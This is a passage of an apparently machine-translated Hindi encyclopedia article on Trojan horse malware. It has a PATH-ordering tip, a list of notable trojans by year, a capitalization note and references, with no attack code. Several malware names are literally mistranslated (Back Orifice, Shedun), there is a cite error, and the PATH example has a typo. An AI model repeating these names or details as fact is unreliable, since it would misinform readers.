कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें . में प्रवेश PATH= पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:..

उल्लेखनीय उदाहरण

निजी और सरकारी

सार्वजनिक रूप से उपलब्ध

  • ईजीएबीटीआर - 1980 के दशक के अंत में
  • नेटबस - 1998 (प्रकाशित)[21]
  • मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
  • पीछे का छिद्र - 1998 (प्रकाशित)
  • बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
  • बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
  • डार्ककॉमेट - 2008-2012 (प्रकाशित)
  • ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
  • घोस्ट आरएटी - 2009 (प्रकाशित)
  • मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[22][23]
  • Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

  • बारह टोटके - 1990
  • क्लिकबॉट.ए - 2006 (खोजा गया)
  • ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
  • ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
  • ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
  • कोबफेस - 2008 (खोजा गया)
  • चोट - 2009 (खोजा गया)
  • कोरफ्लड - 2010 (खोजा गया)
  • टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
  • सोवा - 2022 (खोजा गया)[24]
  • गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[25][26]Cite error: Closing </ref> missing for <ref> tag[27][28]


पूंजीकरण

कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।[29][30]


यह भी देखें

संदर्भ

  1. Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved 2012-04-05.
  2. "ट्रोजन हॉर्स परिभाषा". Retrieved 2012-04-05.
  3. "ट्रोजन हॉर्स". Webopedia. Retrieved 2012-04-05.
  4. "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved 2012-04-05.
  5. "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved 2012-04-05.
  6. "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on 2013-08-19. Retrieved 2020-03-29.
  7. "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
  8. Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved 28 March 2020.
  9. Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
  10. Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
  11. Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
  12. Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
  13. Crapanzano, Jamie (2003). सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स (Report). SANS Institute. Retrieved 2021-05-10.
  14. 14.0 14.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
  15. "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
  16. Dunn, John (27 August 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on 26 January 2014. Retrieved 10 January 2021.
  17. "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved 2018-04-14.
  18. "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on 2009-08-08. Retrieved 2020-03-27.
  19. Datta, Ganesh (2014-08-07). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on 2014-08-12. Retrieved 2020-03-27.
  20. Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
  21. Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved 2021-05-10.
  22. "मेगा पैंजर". SourceForge.
  23. "मिनी टैंक". SourceForge.
  24. "सोवा वायरस क्या है?". India Today.
  25. "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
  26. Neal, Dave (2015-11-20). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on 2015-11-22. Retrieved 2020-03-27.{{cite web}}: CS1 maint: unfit URL (link)
  27. Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
  28. "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". 2015-11-19.
  29. "ट्रोजन". Collins Advanced Dictionary. Retrieved 29 March 2020.
  30. "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved 29 March 2020.


इस पेज में लापता आंतरिक लिंक की सूची

  • प्राचीन यूनानी
  • मिनीपैंजर और मेगापैंजर
  • विदेशी खुफिया सेवा (रूस)
  • एनोम
  • ेगाबत्र
  • घो0स्त चूहा
  • बिफ्रॉस्ट (ट्रोजन हॉर्स)
  • जानवर (ट्रोजन हॉर्स)
  • ज़ीउस (ट्रोजन हॉर्स)
  • जीरो एक्सेस बॉटनेट
  • शैली गाइड

बाहरी संबंध